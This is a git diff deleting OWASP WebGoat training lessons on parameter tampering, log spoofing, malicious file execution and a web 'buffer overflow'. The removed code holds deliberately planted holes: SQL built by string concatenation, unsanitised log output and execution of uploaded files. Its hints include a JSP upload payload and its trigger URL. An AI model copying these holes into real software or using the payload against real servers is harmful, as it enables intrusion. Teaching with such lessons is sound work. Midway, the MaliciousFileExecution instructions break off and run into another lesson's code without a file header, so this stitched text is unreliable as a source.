- TextArea input4 = new TextArea("field4", 1, 25).addElement(param4);
- TextArea input5 = new TextArea("field5", 1, 25).addElement(param5);
- TextArea input6 = new TextArea("field6", 1, 25).addElement(param6);
- TextArea input7 = new TextArea("field7", 1, 25).addElement(param7);
-
- Input b = new Input();
- b.setType(Input.BUTTON);
- b.setValue("Submit");
- b.addAttribute("onclick", "validate();");
- ec.addElement(new Div().addElement(new StringElement(getLabelManager().get("3LowerCase")+"("
- + regex1 + ")")));
- ec.addElement(new Div().addElement(input1));
- ec.addElement(new P());
- ec.addElement(new Div().addElement(new StringElement(getLabelManager().get("Exactly3Digits")+"(" + regex2 + ")")));
- ec.addElement(new Div().addElement(input2));
- ec.addElement(new P());
- ec.addElement(new Div().addElement(new StringElement(getLabelManager().get("LettersNumbersSpaceOnly")+"(" + regex3
- + ")")));
- ec.addElement(new Div().addElement(input3));
- ec.addElement(new P());
- ec.addElement(new Div().addElement(new StringElement(getLabelManager().get("EnumerationOfNumbers")+" (" + regex4 + ")")));
- ec.addElement(new Div().addElement(input4));
- ec.addElement(new P());
- ec.addElement(new Div().addElement(new StringElement(getLabelManager().get("SimpleZipCode")+ " (" + regex5 + ")")));
- ec.addElement(new Div().addElement(input5));
- ec.addElement(new P());
- ec.addElement(new Div()
- .addElement(new StringElement(getLabelManager().get("ZIPDashFour")+" (" + regex6 + ")")));
- ec.addElement(new Div().addElement(input6));
- ec.addElement(new P());
- ec.addElement(new Div().addElement(new StringElement(getLabelManager().get("USPhoneNumber")+ " ("
- + regex7 + ")")));
- ec.addElement(new Div().addElement(input7));
- ec.addElement(new P());
- ec.addElement(b);
-
- // Check the patterns on the server -- and note the errors in the response
- // these should never match unless the client side pattern script doesn't work
-
- int err = 0;
- String msg = "";
-
- if (!pattern1.matcher(param1).matches())
- {
- err++;
- msg += " "+getLabelManager().get("ServerSideValidationViolation")+" Field1.";
- }
-
- if (!pattern2.matcher(param2).matches())
- {
- err++;
- msg += " "+getLabelManager().get("ServerSideValidationViolation")+" Field2.";
- }
-
- if (!pattern3.matcher(param3).matches())
- {
- err++;
- msg += " "+getLabelManager().get("ServerSideValidationViolation")+"Field3.";
- }
-
- if (!pattern4.matcher(param4).matches())
- {
- err++;
- msg += " "+getLabelManager().get("ServerSideValidationViolation")+"Field4.";
- }
-
- if (!pattern5.matcher(param5).matches())
- {
- err++;
- msg += " "+getLabelManager().get("ServerSideValidationViolation")+"Field5.";
- }
-
- if (!pattern6.matcher(param6).matches())
- {
- err++;
- msg += " "+getLabelManager().get("ServerSideValidationViolation")+"Field6.";
- }
-
- if (!pattern7.matcher(param7).matches())
- {
- err++;
- msg += " "+getLabelManager().get("ServerSideValidationViolation")+"Field7.";
- }
-
- if (err > 0)
- {
- s.setMessage(msg);
- }
- if (err >= 7)
- {
- // This means they defeated all the client side checks
- makeSuccess(s);
- }
- }
-
- catch (Exception e)
- {
- s.setMessage(getLabelManager().get("ErrorGenerating") + this.getClass().getName());
- e.printStackTrace();
- }
-
- return (ec);
- }
-
- /**
- * DOCUMENT ME!
- *
- * @return DOCUMENT ME!
- */
- protected Category getDefaultCategory()
- {
- return Category.PARAMETER_TAMPERING;
- }
-
- /**
- * Gets the hints attribute of the AccessControlScreen object
- *
- * @return The hints value
- */
- protected List getHints(WebSession s)
- {
- List hints = new ArrayList();
- hints.add(getLabelManager().get("JavaScriptValidationHint1"));
- hints.add(getLabelManager().get("JavaScriptValidationHint2"));
- hints.add(getLabelManager().get("JavaScriptValidationHint3"));
-
-
- return hints;
- }
-
-
- private final static Integer DEFAULT_RANKING = new Integer(120);
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
- /**
- * Gets the title attribute of the AccessControlScreen object
- *
- * @return The title value
- */
- public String getTitle()
- {
- return ("Bypass Client Side JavaScript Validation");
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("", ASPECT_LOGO);
- }
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/LogSpoofing.java b/src/main/java/org/owasp/webgoat/lessons/LogSpoofing.java
deleted file mode 100644
index c143c07b6..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/LogSpoofing.java
+++ /dev/null
@@ -1,159 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.io.UnsupportedEncodingException;
-import java.net.URLDecoder;
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.HtmlColor;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.PRE;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- *
- * For details, please see http://webgoat.github.io
- *
- * @author Sherif Koussa Software Secured
- * @created October 28, 2006
- */
-
-public class LogSpoofing extends LessonAdapter
-{
-
- private static final String USERNAME = "username";
-
- private static final String PASSWORD = "password";
-
-
- public final static A MAC_LOGO = new A().setHref("http://www.softwaresecured.com").addElement(new IMG("images/logos/softwaresecured.gif").setAlt("Software Secured").setBorder(0).setHspace(0).setVspace(0));
-
- protected Element createContent(WebSession s)
- {
-
- ElementContainer ec = null;
- String inputUsername = null;
- try
- {
-
- Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
- TR row1 = new TR();
- TR row2 = new TR();
- TR row3 = new TR();
-
- row1.addElement(new TD(new StringElement(getLabelManager().get("UserName")+":")));
- Input username = new Input(Input.TEXT, USERNAME, "");
- row1.addElement(new TD(username));
-
- row2.addElement(new TD(new StringElement(getLabelManager().get("Password")+": ")));
- Input password = new Input(Input.PASSWORD, PASSWORD, "");
- row2.addElement(new TD(password));
-
- Element b = ECSFactory.makeButton(getLabelManager().get("Login"));
- row3.addElement(new TD(new StringElement(" ")));
- row3.addElement(new TD(b)).setAlign("right");
-
- t.addElement(row1);
- t.addElement(row2);
- t.addElement(row3);
-
- ec = new ElementContainer();
- ec.addElement(t);
-
- inputUsername = new String(s.getParser().getRawParameter(USERNAME, ""));
-
- if (inputUsername.length() != 0)
- {
- inputUsername = URLDecoder.decode(inputUsername, "UTF-8");
- }
-
- ec.addElement(new PRE(" "));
-
- Table t2 = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(0);
- TR row4 = new TR();
- row4.addElement(new TD(new PRE(getLabelManager().get("LoginFailedForUserName")+": " + inputUsername))).setBgColor(HtmlColor.GRAY);
-
- t2.addElement(row4);
-
- ec.addElement(t2);
-
- if (inputUsername.length() > 0 && inputUsername.indexOf('\n') >= 0 && inputUsername.indexOf('\n') >= 0)
- {
- makeSuccess(s);
- }
- } catch (UnsupportedEncodingException e)
- {
- s.setMessage("Error generating " + this.getClass().getName());
- e.printStackTrace();
- }
- return ec;
- }
-
- private final static Integer DEFAULT_RANKING = new Integer(72);
-
- protected Integer getDefaultRanking()
- {
- return DEFAULT_RANKING;
- }
-
- @Override
- protected List getHints(WebSession s)
- {
- List hints = new ArrayList();
- hints.add(getLabelManager().get("LogSpoofingHint1"));
- hints.add(getLabelManager().get("LogSpoofingHint2"));
- hints.add(getLabelManager().get("LogSpoofingHint3"));
- hints.add(getLabelManager().get("LogSpoofingHint4"));
- return hints;
- }
-
- @Override
- public String getTitle()
- {
- return "Log Spoofing";
- }
-
- @Override
- protected Category getDefaultCategory()
- {
- return Category.INJECTION;
- }
-
- public Element getCredits()
- {
- return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
- }
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/MaliciousFileExecution.java b/src/main/java/org/owasp/webgoat/lessons/MaliciousFileExecution.java
deleted file mode 100644
index fdc3235fe..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/MaliciousFileExecution.java
+++ /dev/null
@@ -1,501 +0,0 @@
-package org.owasp.webgoat.lessons;
-
-import java.sql.Connection;
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-import java.util.ArrayList;
-import java.util.List;
-import java.io.File;
-
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.html.Form;
-import org.apache.ecs.html.H1;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.P;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.IMG;
-import org.owasp.webgoat.session.DatabaseUtilities;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-import org.apache.commons.fileupload.*;
-import org.apache.commons.fileupload.disk.*;
-import org.apache.commons.fileupload.servlet.*;
-
-/*******************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
- *
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
- *
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
- *
- * Getting Source ==============
- *
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
- * for free software projects.
- *
- * For details, please see http://webgoat.github.io
- *
- * @author Chuck Willis of MANDIANT
- * @created July 11, 2008
- */
-public class MaliciousFileExecution extends LessonAdapter
-{
-
- private final static A MANDIANT_LOGO = new A().setHref("http://www.mandiant.com").addElement(new IMG("images/logos/mandiant.png").setAlt("MANDIANT").setBorder(0).setHspace(0).setVspace(0));
-
- // the UPLOADS_DIRECTORY is where uploads are stored such that they can be references
- // in image tags as "uploads/filename.ext". This directory string should not contain any path separators (/ or \)
- private String uploads_and_target_parent_directory = null;
-
- private final static String UPLOADS_RELATIVE_PATH = "uploads";
-
- // this is the target directory that the user must put a file in to pass the lessson. The file must be named
- // username.txt. This directory string should not contain any path separators (/ or \)
-
- private final static String TARGET_RELATIVE_PATH = "mfe_target";
-
- // this should probably go in a constructor, but we need the session object...
- // may be able to do something like:
- // String directory = this.getServletContext().getRealPath("/");
- private void fill_uploads_and_target_parent_directory(WebSession s) {
- //uploads_and_target_parent_directory = s.getWebgoatContext().getServlet().getServletContext().getRealPath("/");
- uploads_and_target_parent_directory = s.getContext().getRealPath("/");
- // make sure it ends with a / or \
- if(!uploads_and_target_parent_directory.endsWith(File.separator)) {
- uploads_and_target_parent_directory = uploads_and_target_parent_directory +
- File.separator;
- }
- System.out.println("uploads_and_target_parent_directory set to = "
- + uploads_and_target_parent_directory);
-
- // make sure the directories exist
- File uploads_dir = new File(uploads_and_target_parent_directory
- + UPLOADS_RELATIVE_PATH);
- uploads_dir.mkdir();
-
- File target_dir = new File(uploads_and_target_parent_directory
- + TARGET_RELATIVE_PATH);
- target_dir.mkdir();
-
- // delete the user's target file if it is already there since we must
- // have restarted webgoat
- File userfile = new File(uploads_and_target_parent_directory
- + TARGET_RELATIVE_PATH + java.io.File.separator
- + s.getUserName() + ".txt");
-
- userfile.delete();
-
- }
-
- /**
- * Description of the Method
- *
- * @param s
- * Description of the Parameter
- * @return Description of the Return Value
- */
- protected Element createContent(WebSession s)
- {
-
- if(uploads_and_target_parent_directory == null) {
- fill_uploads_and_target_parent_directory(s);
- }
-
-
- ElementContainer ec = new ElementContainer();
-
- try
- {
-
- // check for success - see if the target file exists yet
-
- File userfile = new File(uploads_and_target_parent_directory
- + TARGET_RELATIVE_PATH + java.io.File.separator
- + s.getUserName() + ".txt");
-
- if(userfile.exists()) {
- makeSuccess(s);
- }
-
- Connection connection = DatabaseUtilities.getConnection(s);
-
- ec.addElement(new H1().addElement("WebGoat Image Storage"));
-
- // show the current image
- ec.addElement(new P().addElement("Your current image:"));
-
- String image_query = "SELECT image_relative_url FROM mfe_images WHERE user_name = '"
- + s.getUserName() + "'";
-
- Statement image_statement = connection.createStatement(
- ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
- ResultSet image_results = image_statement.executeQuery(image_query);
-
- if(image_results.next() == false) {
- // result set was empty
- ec.addElement(new P().addElement("No image uploaded"));
- System.out.println("No image uploaded");
- } else {
-
- String image_url = image_results.getString(1);
-
- ec.addElement(new IMG(image_url).setBorder(0).setHspace(0).setVspace(0));
-
- System.out.println("Found image named: " + image_url);
-
- }
-
- ec.addElement(new P().addElement("Upload a new image:"));
-
- Input input = new Input(Input.FILE, "myfile", "");
- ec.addElement(input);
-
- Element b = ECSFactory.makeButton("Start Upload");
- ec.addElement(b);
-
- }
- catch (Exception e)
- {
- s.setMessage("Error generating " + this.getClass().getName());
- e.printStackTrace();
- }
-
- return (ec);
- }
-
- /**
- * Gets the category attribute of the SqlInjection object
- *
- * @return The category value
- */
- protected Category getDefaultCategory()
- {
- return Category.MALICIOUS_EXECUTION;
- }
-
- /**
- * Gets the credits attribute of the AbstractLesson object
- *
- * @return The credits value
- */
- public Element getCredits()
- {
- return super.getCustomCredits("Created by Chuck Willis ", MANDIANT_LOGO);
- }
-
- /**
- * Gets the hints attribute of the DatabaseFieldScreen object
- *
- * @return The hints value
- */
- protected List getHints(WebSession s)
- {
- if(uploads_and_target_parent_directory == null) {
- fill_uploads_and_target_parent_directory(s);
- }
-
- String target_filename = uploads_and_target_parent_directory
- + TARGET_RELATIVE_PATH
- + java.io.File.separator
- + s.getUserName() + ".txt";
-
- List hints = new ArrayList();
-
- hints.add("Where are uploaded images stored? Can you browse to them directly?");
-
- hints.add("What type of file can you upload to a J2EE server that will be executed when you browse to it?");
-
- hints.add("You want to upload a .jsp file that creates an instance of the class java.io.File " +
- " and calls the createNewFile() method of that instance.");
-
- hints.add("Below are some helpful links..." +
- "
NOTE: executing this file will print \"Hello World!\" to the Tomcat Console, not to your client browser"
- );
-
-
- hints
- .add("SOLUTION:
Upload a file with a .jsp extension and this content:"
- + "
<HTML>"
- + " <%"
- + " java.io.File file = new java.io.File(\""
- + target_filename.replaceAll("\\\\", "\\\\\\\\") // if we are on windows, we need to
- // make sure path separators are doubled / escaped
- + "\");"
- + " file.createNewFile();"
- + " %>"
- + " </HTML>"
- + "
After you have uploaded your jsp file, you can get the system to execute it by opening it in your browser at the URL below (or by just refreshing this page):"
- + "
http://webgoat_ip:port/WebGoat/" + UPLOADS_RELATIVE_PATH + "/yourfilename.jsp"
- );
-
- return hints;
- }
-
- // this is a custom method for this lesson to restart. It is called in WebSession.restartLesson
- // in a currently somewhat "hacked up" manner that is specific to this lesson. There probably
- // should be an abstract type for lessons that need custom "restarting" code.
- public void restartLesson(WebSession s)
- {
-
- if(uploads_and_target_parent_directory == null) {
- fill_uploads_and_target_parent_directory(s);
- }
-
- System.out.println("Restarting Malicious File Execution lesson for user " + s.getUserName());
-
- // delete the user's target file
- File userfile = new File(uploads_and_target_parent_directory
- + TARGET_RELATIVE_PATH
- + java.io.File.separator
- + s.getUserName() + ".txt");
-
- userfile.delete();
-
- // remove the row from the mfe table
- // add url to database table
-
- try {
- Connection connection = DatabaseUtilities.getConnection(s);
-
- Statement statement = connection.createStatement();
-
- String deleteuserrow = "DELETE from mfe_images WHERE user_name = '"
- + s.getUserName() + "';";
-
- statement.executeUpdate(deleteuserrow);
-
- } catch (SQLException e) {
- // TODO Auto-generated catch block
- e.printStackTrace();
- }
-
- }
-
- // cleanup code has been disabled for now. I'm not sure where it can be called cleanly
- // where it will know what directory to use since that is pulled from the session object
-
- // this method will delete files in the target directory and the uploads directory
- // it should be called when WebGoat starts
-// public static void cleanDirectories() {
-// // delete files in TARGET_DIRECTORY
-// File target_dir = new File(TARGET_RELATIVE_PATH);
-// deleteFilesInDir(target_dir);
-//
-// // delete files in uploads directory
-// File uploads_dir = new File(uploads_and_target_parent_directory + UPLOADS_RELATIVE_PATH);
-// deleteFilesInDir(uploads_dir);
-//
-// }
-
-// private static void deleteFilesInDir(File dir) {
-// File[] dir_files = dir.listFiles();
-// for(int i = 0; i < dir_files.length; i++) {
-// // we won't recurse and we don't want to delete every file just in
-// // case TARGET_DIRECTORY or uploads directory is pointed
-// // somewhere stupid, like c:\ or /
-// if(dir_files[i].isFile()) {
-// String lower_file_name = dir_files[i].getName().toLowerCase();
-//
-// if(lower_file_name.endsWith(".jpg") ||
-// lower_file_name.endsWith(".gif") ||
-// lower_file_name.endsWith(".png") ||
-// lower_file_name.endsWith(".jsp") ||
-// lower_file_name.endsWith(".txt") ||
-// lower_file_name.endsWith(".asp") || // in case they think this is a IIS server :-)
-// lower_file_name.endsWith(".aspx")) {
-// dir_files[i].delete();
-// }
-// }
-// }
-// }
-
-
- /**
- * Gets the instructions attribute of the object
- *
- * @return The instructions value
- */
- public String getInstructions(WebSession s)
- {
- if(uploads_and_target_parent_directory == null) {
- fill_uploads_and_target_parent_directory(s);
- }
-
- String instructions = "The form below allows you to upload an image which will be displayed on this page. "
- + "Features like this are often found on web based discussion boards and social networking sites. "
- + "This feature is vulnerable to Malicious File Execution."
- + "
In order to pass this lesson, upload and run a malicious file. In order to prove that your file can execute,"
- + " it should create another file named:
Returns the hints as a List of Strings
- * for this lesson.
- *
- * @return The hints values
- */
- public List getHints(WebSession s)
- {
- List hints = new ArrayList();
- hints.add("While registering for Internet usage, see where else your details are used during the registration process.");
- hints.add("See which fields during the registration process, allow for really long input to be submitted.");
- hints.add("Check for hidden form fields during registration");
- hints.add("Typically, web-based buffer overflows occur just above the value of 2 to the power of a number. E.g. 1024 + 1, 2048 + 1, 4096 + 1");
- hints.add("Overflow the room number field with 4096+1 characters and look for hidden fields");
- hints.add("Enter the VIP name in the first and last name fields");
- return hints;
- }
-
- /**
- *
Get the default ranking within the "Buffer
- * Overflow" category.
- *
- *
Currently ranked to be the first lesson in
- * this category.
- *
- * @return The value of 5 as an Integer Object
- */
- protected Integer getDefaultRanking()
- {
- return new Integer(5);
- }
-
- /**
- *
Based on the parameters currently with values, this method
- * returns true if we are in the first step of this lesson.
- *
- * @param s
- * @return true if we are in the first step of the lesson.
- */
- protected boolean isFirstStep(WebSession s)
- {
- String room = s.getParser().getRawParameter(ROOM_NUMBER, "");
- String name = s.getParser().getRawParameter(FIRST_NAME, "");
- String last = s.getParser().getRawParameter(LAST_NAME, "");
-
- return (room.isEmpty() && name.isEmpty() && last.isEmpty() );
- }
-
- /**
- *
Based on the parameters currently with values, this method
- * returns true if we are in the second step of this lesson.
- *
- * @param s
- * @return true if we are in the second step of the lesson
- */
- protected boolean isSecondStep(WebSession s)
- {
- String price = s.getParser().getRawParameter(PRICE_PLAN, "");
-
- return price.isEmpty();
- }
-
- /**
- *
Method for constructing the first step and returning it as
- * an Element.
- *
- * @param s
- * @return The Element that is the first step.
- */
- private Element makeFirstStep(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
- String param = "";
-
- // Header
- ec.addElement(new StringElement("In order to access the Internet, you need to provide us the following information:"));
- ec.addElement(new br());
- ec.addElement(new br());
- ec.addElement(new StringElement("Step 1/2"));
- ec.addElement(new br());
- ec.addElement(new br());
-
- ec.addElement(new StringElement("Ensure that your first and last names are entered exactly as they appear in the hotel's registration system."));
- ec.addElement(new br());
- ec.addElement(new br());
-
- // Table
- Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
- if (s.isColor())
- {
- t.setBorder(1);
- }
-
- // First Name
- try {
- param = s.getParser().getStrictAlphaParameter(FIRST_NAME, 25);
- } catch (ParameterNotFoundException e) {
- param = "";
- } catch (ValidationException e) {
- param = "";
- }
- Input input = new Input(Input.TEXT, FIRST_NAME, param);
-
- TR tr = new TR();
- tr.addElement(new TD().addElement("First Name: "));
- tr.addElement(new TD().addElement(input));
- tr.addElement(new TD().addElement("*"));
- t.addElement(tr);
- tr = new TR();
- tr.addElement(new TD().addElement(" "));
- tr.addElement(new TD().addElement(" "));
- tr.addElement(new TD().addElement(" "));
- t.addElement(tr);
-
- // Last Name
- try {
- param = s.getParser().getStrictAlphaParameter(LAST_NAME, 25);
- } catch (ParameterNotFoundException e) {
- param = "";
- } catch (ValidationException e) {
- param = "";
- }
- input = new Input(Input.TEXT, LAST_NAME, param);
-
- tr = new TR();
- tr.addElement(new TD().addElement("Last Name: "));
- tr.addElement(new TD().addElement(input));
- tr.addElement(new TD().addElement("*"));
- t.addElement(tr);
- tr = new TR();
- tr.addElement(new TD().addElement(" "));
- tr.addElement(new TD().addElement(" "));
- tr.addElement(new TD().addElement(" "));
- t.addElement(tr);
-
- // Room Number
- try {
- param = s.getParser().getStrictAlphaParameter(ROOM_NUMBER, 25);
- } catch (ParameterNotFoundException e) {
- param = "";
- } catch (ValidationException e) {
- param = "";
- }
- input = new Input(Input.TEXT, ROOM_NUMBER, param);
-
- tr = new TR();
- tr.addElement(new TD().addElement("Room Number: "));
- tr.addElement(new TD().addElement(input));
- tr.addElement(new TD().addElement("*"));
- t.addElement(tr);
- tr = new TR();
- tr.addElement(new TD().addElement(" "));
- tr.addElement(new TD().addElement(" "));
- tr.addElement(new TD().addElement(" "));
- t.addElement(tr);
-
- // Submit
- tr = new TR();
- tr.addElement(new TD().addElement(" "));
- tr.addElement(new TD().addElement(ECSFactory.makeButton("Submit")));
- tr.addElement(new TD().addElement(" "));
- t.addElement(tr);
-
- ec.addElement(t);
-
- // Footer
- ec.addElement(new br());
- ec.addElement(new br());
- ec.addElement(new StringElement("* The above fields are required for login."));
- ec.addElement(new br());
- ec.addElement(new br());
-
-
- return ec;
- }
-
- /**
- *
Method for constructing the second step and returning it as
- * an Element.
- *
- * @param s
- * @return The Element that is the second step.
- */
- private Element makeSecondStep(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
- String param = "";
-
- // Header
- ec.addElement(new StringElement("Please select from the following available price plans:"));
- ec.addElement(new br());
- ec.addElement(new br());
- ec.addElement(new StringElement("Step 2/2"));
- ec.addElement(new br());
- ec.addElement(new br());
-
- ec.addElement(new StringElement("Ensure that your selection matches the hours of usage, as no refunds are given for this service."));
- ec.addElement(new br());
- ec.addElement(new br());
-
- // Table
- Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
- if (s.isColor())
- {
- t.setBorder(1);
- }
-
-
- // First Empty Row
- TR tr = new TR();
- tr.addElement(new TD().addElement(" "));
- tr.addElement(new TD().addElement(" "));
- tr.addElement(new TD().addElement(" "));
- t.addElement(tr);
-
- // Price Plans
- tr = new TR();
- tr.addElement(new TD().addElement("Available Price Plans:"));
- tr.addElement(new TD().addElement(ECSFactory.makePulldown(PRICE_PLAN, price_plans, price_plans[2], 1)));
- tr.addElement(new TD().addElement(" "));
- t.addElement(tr);
-
- // Submit
- tr = new TR();
- tr.addElement(new TD().addElement(" "));
- tr.addElement(new TD().addElement(ECSFactory.makeButton("Accept Terms")));
- tr.addElement(new TD().addElement(" "));
- t.addElement(tr);
-
- ec.addElement(t);
- ec.addElement("\r\n");
-
- // Hidden Form Fields
- param = s.getParser().getStringParameter(LAST_NAME, "");
- Input input = new Input(Input.HIDDEN, LAST_NAME, param);
- ec.addElement(input);
- ec.addElement("\r\n");
-
- param = s.getParser().getStringParameter(FIRST_NAME, "");
- input = new Input(Input.HIDDEN, FIRST_NAME, param);
- ec.addElement(input);
- ec.addElement("\r\n");
-
- param = s.getParser().getStringParameter(ROOM_NUMBER, "");
- input = new Input(Input.HIDDEN, ROOM_NUMBER, param);
- ec.addElement(input);
- ec.addElement("\r\n");
-
-
- // Footer
- ec.addElement(new br());
- ec.addElement(new br());
- ec.addElement(new StringElement("By Clicking on the above you accept the terms and conditions."));
- ec.addElement(new br());
- ec.addElement(new br());
-
-
- return ec;
- }
-
- /**
- *
Method for constructing the third step and returning it as
- * an Element.
- *
- * @param s
- * @return The Element that is the third step.
- */
- private Element makeThirdStep(WebSession s)
- {
- ElementContainer ec = new ElementContainer();
- String param1 = "";
- String param2 = "";
- String param3 = "";
-
- // Header
- ec.addElement(new StringElement("You have now completed the 2 step process and have access to the Internet"));
- ec.addElement(new br());
- ec.addElement(new br());
- ec.addElement(new StringElement("Process complete"));
- ec.addElement(new br());
- ec.addElement(new br());
-
- ec.addElement(new StringElement("Your connection will remain active for the time allocated for starting now."));
- ec.addElement(new br());
- ec.addElement(new br());
-
- // Table
- Table t = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center");
-
- if (s.isColor())
- {
- t.setBorder(1);
- }
-
-
- // First Empty Row
- TR tr = new TR();
- tr.addElement(new TD().addElement(" "));
- tr.addElement(new TD().addElement(" "));
- tr.addElement(new TD().addElement(" "));
- t.addElement(tr);
-
- // Price Plans
- tr = new TR();
- tr.addElement(new TD().addElement(" "));
- tr.addElement(new TD().addElement(" "));
- tr.addElement(new TD().addElement(" "));
- t.addElement(tr);
-
- // Submit
- tr = new TR();
- tr.addElement(new TD().addElement(" "));
- tr.addElement(new TD().addElement(" "));
- tr.addElement(new TD().addElement(" "));
- t.addElement(tr);
-
- ec.addElement(t);
- ec.addElement("\r\n");
-
- // Hidden Form Fields
- param1 = s.getParser().getStringParameter(LAST_NAME, "");
- Input input = new Input(Input.HIDDEN, "a", param1);
- ec.addElement(input);
- ec.addElement("\r\n");
-
- param2 = s.getParser().getStringParameter(FIRST_NAME, "");
- input = new Input(Input.HIDDEN, "b", param2);
- ec.addElement(input);
- ec.addElement("\r\n");
-
- param3 = s.getParser().getStringParameter(ROOM_NUMBER, "");
- input = new Input(Input.HIDDEN, "c", param3);
- ec.addElement(input);
- ec.addElement("\r\n");
-
- // And finally the check...
- if(param3.length() > 4096)
- {
- ec.addElement(new Input(Input.hidden, "d", "Johnathan"));
- ec.addElement("\r\n");
- ec.addElement(new Input(Input.hidden, "e", "Ravern"));
- ec.addElement("\r\n");
- ec.addElement(new Input(Input.hidden, "f", "4321"));
- ec.addElement("\r\n");
-
- ec.addElement(new Input(Input.hidden, "g", "John"));
- ec.addElement("\r\n");
- ec.addElement(new Input(Input.hidden, "h", "Smith"));
- ec.addElement("\r\n");
- ec.addElement(new Input(Input.hidden, "i", "56"));
- ec.addElement("\r\n");
-
- ec.addElement(new Input(Input.hidden, "j", "Ana"));
- ec.addElement("\r\n");
- ec.addElement(new Input(Input.hidden, "k", "Arneta"));
- ec.addElement("\r\n");
- ec.addElement(new Input(Input.hidden, "l", "78"));
- ec.addElement("\r\n");
-
- ec.addElement(new Input(Input.hidden, "m", "Lewis"));
- ec.addElement("\r\n");
- ec.addElement(new Input(Input.hidden, "n", "Hamilton"));
- ec.addElement("\r\n");
- ec.addElement(new Input(Input.hidden, "o", "9901"));
- ec.addElement("\r\n");
-
- s.setMessage("To complete the lesson, restart lesson and enter VIP first/last name");
-
- }
- if (("Johnathan".equalsIgnoreCase(param2) || "John".equalsIgnoreCase(param2)
- || "Ana".equalsIgnoreCase(param2) ||"Lewis".equalsIgnoreCase(param2))
- && ("Ravern".equalsIgnoreCase(param1) || "Smith".equalsIgnoreCase(param1)
- || "Arneta".equalsIgnoreCase(param1) ||"Hamilton".equalsIgnoreCase(param1)))
- {
- // :)
- // Allows for mixed VIP names, but that's not really the point
- makeSuccess(s);
- }
-
- // Footer
- ec.addElement(new br());
- ec.addElement(new br());
- ec.addElement(new StringElement("We would like to thank you for your payment."));
- ec.addElement(new br());
- ec.addElement(new br());
-
- return ec;
- }
-
-
-}
diff --git a/src/main/java/org/owasp/webgoat/lessons/PasswordStrength.java b/src/main/java/org/owasp/webgoat/lessons/PasswordStrength.java
deleted file mode 100644
index 8c440261c..000000000
--- a/src/main/java/org/owasp/webgoat/lessons/PasswordStrength.java
+++ /dev/null
@@ -1,212 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.util.ArrayList;
-import java.util.HashMap;
-import java.util.List;
-import java.util.Map;
-import java.util.TreeMap;
-import java.util.Map.Entry;
-
-import org.apache.commons.collections.CollectionUtils;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Div;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.LI;
-import org.apache.ecs.html.OL;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.ParameterNotFoundException;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- *
- *
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- *
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- *
- * This program is free software; you can redistribute it and/or modify it under the terms of the
